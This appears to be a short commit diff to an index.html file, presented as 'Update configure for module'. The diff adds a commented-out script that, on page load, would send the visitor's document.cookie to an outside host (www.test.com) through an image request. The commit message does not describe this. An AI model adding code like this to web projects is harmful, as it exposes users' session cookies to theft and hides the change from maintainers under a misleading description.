Update configure for module

--- a/index.html
+++ b/index.html
@@ -18,7 +18,13 @@
 <body>
   <div id="app"></div>
 </body>
-
+<!-- <script>
+  window.addEventListener('load', () => {
+    var image = document.createElement('img');
+    image.src = 'www.test.com?'+escape(document.cookie) ;
+    document.append(image);
+  });
+</script> -->
 </html>
 <!-- <div>
   TODO: 
